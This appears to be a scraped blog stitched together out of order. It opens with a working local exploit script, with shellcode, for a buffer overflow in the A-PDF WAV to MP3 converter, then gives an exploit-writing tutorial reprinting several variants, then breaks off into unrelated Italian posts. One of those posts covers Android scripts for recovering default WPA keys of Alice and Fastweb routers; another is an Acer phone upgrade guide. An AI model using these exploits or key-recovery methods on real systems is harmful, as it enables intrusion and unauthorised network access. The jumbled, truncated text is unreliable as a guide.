buff = ("\x41"*4128);# 76541842 ret in user32.dll# 00428F3F jmp esp in wavtomp3.exe
eip = ("\x42\x18\x54\x76");
esp = ("\x3f\x8f\x42\x00");
nops = ("\x90"*4);
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4""\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15""\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3""\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd""\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99""\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28""\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa""\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a""\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7""\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88""\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a""\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73""\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02""\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86""\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60""\xc8\x29\x9e");
sploit = (buff + eip + esp + nops +shellcode);try:
f1 = open("Drop4.wav","w");#No file checking, any file extension works... (.xyz .foo .abc)
f1.write(sploit);
f1.close();print('[*] Success. Load File.');except:
print("[-] Error, could not write the file.");
SEH
Every application has a default exception handler which is provided by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit more reliable on various windows platforms, but it requires some more explanations before you can start abusing the SEH to write exploits. That’s why the next tutorial will be entirely dedicated to this technique.
The following video shows these techniques just described:
If this is true or not no one knows but it is interesting to have an idea about cyber market.
You can read the full interview about SpyEye, a variant of Zeus Botnet, here:
- SpyEye Analysis Part 1
- SpyEye Analysis Part 2
This article begins a small series of tutorials that aims to make you understand in an easier and more detailed way how to build an exploit. The Internet is an inexhaustible source of knowledge and I also want to give my contribution.
In most cases when there is an exploit which takes advantage of a vulnerability, it does not work. This does not mean that there is not the vulnerability but that some small piece of the puzzle was not reassembled correctly. The goal of this first tutorial is to understand in simple steps how these vulnerabilities work, in order to write working exploits according to our needs.
Let’s start with this exploit, which allows a buffer overflow (BOF) of the program a-pdf, a tool to convert WAV to MP3.
The exploit was tested on XP with Service Pack 3. So it doesn’t work on different platform like Win7.
You can download the code below:
#!/usr/bin/env python################################################################################### Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit# Exloit By: Dr_IDE# Tested On: XPSP3# Date: August 18, 2010# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html# Reference: http://www.exploit-db.com/exploits/14676/# Usage: Import File, Select It, Click Play, Calc.## EDB Notes:# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct# EIP overwrite which is operating system specific.################################################################################### windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEHcode = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49""\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56""\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41""\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42""\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a""\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47""\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c""\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a""\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46""\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45""\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c""\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c""\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44""\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c""\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46""\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50""\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44""\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45""\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43""\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b""\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43""\x51\x42\x4c\x42\x43\x43\x30\x41\x41");
buff = ("\x41"*4132);
nops = ("\x90"*12);
nseh = ("\xEB\x06\x90\x90");
retn = ("\x5C\x26\x47\x00");
junk = ("\x42"*300);
sploit = (buff+ nseh + retn + nops + code + junk);try:
f1 = open("Dr_IDEs.wav","w");#No file checking, any file extension works... (.xyz .foo .abc)
f1.write(sploit);
f1.close();print('[*] Success. Load File.');except:
print("[-] Error, could not write the file.");
As you could read, the exploit should launch calc.exe, but unfortunately we can only see an application crash on Win7.
But how can we exploit this vulnerability for Win7?
This “simple” question will allow us to understand how the Windows stack works.
Currently what we have to know is that when the CPU loads a program into memory three components are placed:
- Code segment
- Data segment
- Stack segment
Stack section loads and unloads frames, and to perform this function the CPU uses registers.
The most important ones are:
- ESP pointer on the stack
- EBP: pointer to the base of the stack
- EIP: pointer to next instruction
Now I would not go into details which have already been widely discussed on the Internet, refer to Google to fill some gaps in this article.
Stay tuned to our goal we say that there are many techniques of jumping to exploit a BOF. Watching this exploit is clear that it uses a technique called SEH, nevertheless in this tutorial we’ll see how to use a jmp esp.
Firstly we verify that there is actually BOF and the eip is overwritten:
#!/usr/bin/env python# http://www.exploit-db.com/exploits/14681/################################################################################### Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit# Exloit By: Dr_IDE# Tested On: XPSP3# Date: August 18, 2010# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html# Reference: http://www.exploit-db.com/exploits/14676/# Usage: Import File, Select It, Click Play, Calc.## EDB Notes:# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct# EIP overwrite which is operating system specific.################################################################################### windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH# It Doesn't Work
buff = ("\x41"*5000);
sploit = (buff);try:
f1 = open("Dr_IDEs2.wav","w");#No file checking, any file extension works... (.xyz .foo .abc)
f1.write(sploit);
f1.close();print('[*] Success. Load File.');except:
print("[-] Error, could not write the file.");
At this point we run the a-pdf application and link the process to OllyDbg.
By converting the newly created file with the exploit we notice that the application crashs and we verify precisely that the EIP is overwritten with all A “\ x41″ in hexadecimal notation:
So the BOF happens, but in order to be used it is necessary to calculate the offset, the right range where the EIP is overwritten. To help us there are some tools in the framework Metasploit:
Eip point to 46366846. So to calculate the offset we can use another tool of Metasploit. It takes as input the value just found and the number of bytes which created the BOF.
Now we know exactly where to overwrite the EIP. We have a structure like this:
[ 4128 bytes BOF ] [ 4 bytes eip ] [ Other bytes where we can put the shellcode ]
We know that once the EIP is overwritten and the flow of execution is captured, there is another register that could be useful to point directly to the shellcode: ESP, or the top of the stack.
Let’s see exactly what happens:
#!/usr/bin/env python# http://www.exploit-db.com/exploits/14681/################################################################################### Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit# Exloit By: Dr_IDE# Tested On: XPSP3# Date: August 18, 2010# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html# Reference: http://www.exploit-db.com/exploits/14676/# Usage: Import File, Select It, Click Play, Calc.## EDB Notes:# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct# EIP overwrite which is operating system specific.################################################################################### windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH# It Doesn't Work
buff = ("\x41"*4128);
eip = ("\x42"*4);
shellcode = ("\x43"*200);
sploit = (buff + eip + shellcode);try:
f1 = open("Dr_IDEs4.wav","w");#No file checking, any file extension works... (.xyz .foo .abc)
f1.write(sploit);
f1.close();print('[*] Success. Load File.');except:
print("[-] Error, could not write the file.");
In this script we created a BOF with the character “\ x41″, overwrote the EIP with “\ x42″ and injected other code “\ x43″. Analyzing the registers we note that the EIP has been properly overwritten and the ESP contains the character C or “\ x43”. Bingo!
Now we replace the characters “\x43″ with a working shellcode and overwrite the EIP with a jmp esp opcode. Thus when the program flow reaches the EIP, it will jump straight to our shellcode. In order to find a jmp esp opcode is necessary to look for the dll of OS and the program that loads at startup.
Hitting on “E” OllyDbg, you can see all DLLs loaded:
Double click on dll and then right click we go to “Search for -> All commands -> jmp esp”:
Found commands
Address Disassembly Comment
76BA1000 CMP DWORD PTR DS:[EDI+243276F8],ECX (Initial CPU selection)
76BC6D53 JMP ESP
So 76BC6D53 is the address with the instruction jmp esp inside user32.dll “\x53\x6d\xbc\x76″ in little endian. However, to make the exploit more reliable as possible is good practice to use dll or exe which are loaded from the program, such as “wavtomp3.exe”.
Now we can add shellcode to launch calc.exe:
# http://www.exploit-db.com/exploits/14681/################################################################################### Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit# Exloit By: Dr_IDE# Tested On: XPSP3# Date: August 18, 2010# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html# Reference: http://www.exploit-db.com/exploits/14676/# Usage: Import File, Select It, Click Play, Calc.## EDB Notes:# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct# EIP overwrite which is operating system specific.################################################################################### windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH# It Doesn't Work
buff = ("\x41"*4128);# 76bc6d53
eip = ("\x53\x6d\xbc\x76");
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4""\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15""\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3""\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd""\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99""\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28""\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa""\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a""\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7""\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88""\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a""\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73""\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02""\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86""\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60""\xc8\x29\x9e");
sploit = (buff + eip + shellcode);try:
f1 = open("Dr_IDEs5.wav","w");#No file checking, any file extension works... (.xyz .foo .abc)
f1.write(sploit);
f1.close();print('[*] Success. Load File.');except:
print("[-] Error, could not write the file.");
Perfect! We have finished. This is what you’re thinking … but actually the exploit still not work. Analysing with OllyDbg we note that only the 17th character of the shellcode is present in the EIP:
In questi giorni d’estate, fuori da sbattimenti vari, sto cercando di portare a termine quella “ToDoList” che mi ero fatto durante il periodo invernale. Spesso mi capita di leggere cose interessanti e non aver il tempo necessario per applicarle/testarle/provarle. Così mi limito ad appuntarle e inesorabilmente la lista aumenta.
Tra le varie cose, mi ero promesso di scrivere due semplici script per il calcolo della WPA di default di Alice e Fastweb compatibili per il mio Android in modo da avere un piccolo coltellino svizzero sempre con me. In precedenza avevo codato qualcosa, ma visti i numerosi script ormai reperibilissimi in rete non vedo perchè non pubblicare una versione compatibile per Android qui.
Requisiti
Per far funzionare al meglio i miei script è necessario avere:
Accesso root linklink – indispensabile per cambiare i permessi ai file
Adb funzionante linklink – indispensabile per i trasferimenti dei file
Una volta preparato l’ambiente è necessario installare sul mobile busybox, bc, e la bash. Android lavora su architettura ARM sono quindi necessari binary compilati per questi sistemi embedded:
Prima di utilizzare gli script bisogna considerare che non tutti i router sono vulnerabili ma attualmente solo quelli con il SSID mostrati nelle due liste:
adb remount
adb push fast /sdcard
adb push alice /sdcard
Utilizzo
Prendete il mobile e con l’applicazione Astro aprite lo script per modificate gli input: la variabile ssid e mac nel caso di Alice, la variabile input nel caso di Fastweb.
Dopo di che utilizzate ConnectBot per avere una shell in Android e per lanciare gli script digitate questi comandi:
su
cd /sdcard
bash fast
bash alice
Demo
Enjoy.
Disclaimer: Non mi retengo in nessun modo responsabile per le informazioni descritte in questo articolo e per l’uso che ne vogliate fare.
Proprio in questi giorni a Las Vegas si è concluso il 18esimo Defcon, una manifestazione dove i migliori Hacker di tutto il mondo si riuniscono e presentano nuove metodologie di attacco. La novità di quest’anno è senza dubbio l’attacco alla WPA2, crittografia attualmente considerata la più sicura nelle reti WiFi.
Tuttavia mi piace condividere anche quest’altra interessante presentazione su SHODAN, un motore di ricerca per computer e server. SHODAN permette di scovare in Internet devices come router, switch, server web… insomma un bel patrimonio di risorse! Molto intriganti sono i case study di cui uno relativo a Cisco e molto simile a quello che avevo discusso qui.
Ci ho passato un pomeriggio ma alla fine il risultato ha ripagato il tempo impiegato!
Come ben sapete è uscita la versione ufficiale di Android 2.1 per l’Acer Liquid:
Le principali novità che ho potuto apprezzare fin da subito sono:
- Multitouch perfettamente funzionante;
- Integrazione con Picasa;
- Backup dei contatti in automatico;
- 5 Desktop;
- Bluetooth finalmente funzionante;
- Menù migliorato molto più bello da vedere.
Unica nota dolente probabilmente sarà la batteria, infatti Eclair (Android 2.1) consuma leggermente di più rispetto a Donut (Android 1.6). Tuttavia l’aggiornamento è d’obbligo e vediamo come fare.
Installazione di Eclair Android 2.1
L’upgrade alla versione 2.1 non è una operazione complicata! Quindi non spaventatevi.
Per prima cosa è necessario recuperare la Rom direttamente dal sito ufficiale dell’Acer. Una volta decompresso il pacchetto sarà sufficiente lanciare il setup.exe presente all’interno della cartella EUU_Acer_LiquidE_1.100.39_EMEA-GEN1_04.02.02.
Mi raccomando fino a questo punto non collegate il telefono all’usb del pc, bensì attendete il momento in cui ve lo sarà chiesto, come mostrato nell’immagine, a quel punto allora collegatelo.
Una volta premuto “Avanti” non dovete far altro che attendere la conclusione della procedura di reflash. Il telefono effettuerà un reboot con Eclair Android 2.1 pronto per essere utilizzato.
Problema sul riconoscimento della versione precedente
Se come me partivate con una Rom Acer_liquid_1.002.03_EMEA_GEN1 (Impostazioni -> Info sul Telefono -> Numero Build) e l’utility dell’Acer non vi ha riconosciuto la versione precedente non consentendovi di procedere, allora è necessario fare qualche passaggio in più.
Scaricatevi questo Acer Tool e questa Build. Scompattate il pacchetto e lanciate ACER Download Tool [Single].exe che trovate all’interno della directory principale. Collegate il telefonino e selezionate con l’Acer Tool la build appena scaricata. Cliccate su Start e non scollegate l’usb fino al termine dalla procedura.
Se tutto è andato per il verso giusto il telefono reboota con Eclair Android 2.1. A questo punto potete tenervi questa build oppure rifare il primo passaggio utilizzando quella ufficiale visto che ora l’utility dell’Acer riconosce la versione precedente.
Fonte:
Tutte queste info le ho recuperate dall’ottimo forum di batista70. Scopo di questo post è stato quello di sintetizzare i concetti principali elencati in questo thread. Da segnalare anche la Rom non ufficiale b70p 2.0 sicuramente da testare visto l’interessante video di presentazione.
